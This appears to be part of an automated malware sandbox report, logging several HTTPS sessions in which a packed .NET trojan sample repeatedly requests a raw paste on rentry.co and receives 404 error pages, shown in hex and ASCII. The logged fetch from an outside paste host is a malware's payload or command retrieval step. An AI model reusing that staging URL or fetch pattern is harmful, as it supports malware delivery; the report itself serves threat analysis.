                                                                                        2024-10-18 10:43:16 UTC713INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:16 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:16 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:16 UTC1008INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 32 38 38 63 64 65 34 36 38 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4e 69 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed288cde468c',t:'MTcyOTI0ODE5Ni4wMDAwMD
                                                                                        2024-10-18 10:43:16 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:43:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.660680104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:17 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:17 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:17 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BoZc4jDOUAOCariIfDFAFbFgrmVHqMWoyffvLfA4DjvSd6E1EGimb14ce14iHguDEq3NIFYuIxVGtMPgY5VX5BTYHpXzs22%2BEkiP9zFd%2Fuy5hhKWXWlzik8geA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed3299756b50-DFW
                                                                                        2024-10-18 10:43:17 UTC715INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:17 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:17 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:17 UTC1006INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 33 32 39 39 37 35 36 62 35 30 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4e 79 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed3299756b50',t:'MTcyOTI0ODE5Ny4wMDAwMDA=
                                                                                        2024-10-18 10:43:17 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.660681104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:19 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:19 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:19 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DfrkBTx7VzUM2EMpxT55HLwvaOPvOmW1YSWZK3KS2jV95vZ9UJUAvAKTxV72noEoWJXGZ2PjlZj5O75rQuMgZ%2FBRhAzw1XLwl6G7UaHJmnvUv7u4b9pa9KeIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed3c6de76b36-DFW
                                                                                        2024-10-18 10:43:19 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:19 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:43:19 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:43:19 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 33 63 36 64 65 37 36 62 33 36 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed3c6de76b36',t:'MTcyOTI0ODE5OS4wMDAwMDA='}
                                                                                        2024-10-18 10:43:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.660682104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:20 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:20 UTC677INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:20 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O71iE4k4cqjZWQPPt6tduTph8ucnR0Y3u%2BMsmqcE2y9kz0Dt4k2PrMSTirs9bJgUymlxkTVBfBtPU2rFikNm8QBm%2FO0sckGqoiM8RBY41UDD8LFKN9RtAM2q6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed45ee482cca-DFW
                                                                                        2024-10-18 10:43:20 UTC692INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:20 UTC1369INData Raw: 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e
                                                                                        Data Ascii: 512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editin
                                                                                        2024-10-18 10:43:20 UTC1369INData Raw: 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                        Data Ascii: org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-
                                                                                        2024-10-18 10:43:20 UTC1030INData Raw: 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 34 35 65 65 34 38 32 63 63 61 27 2c 74 3a 27 4d
                                                                                        Data Ascii: src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed45ee482cca',t:'M
                                                                                        2024-10-18 10:43:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.660684104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:22 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:22 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:22 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qK99Ayu5opnufWT%2FV1vfqh4aDJbe56bo%2BSItQX%2BgaIYdhmhftXU300L4vruqb405WfACLbrpiHFaYJGRVGrJFxXRkS%2FL5IVN5yBRORsAkLGsJR3qru0JjhIGpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed4f38243aaa-DFW
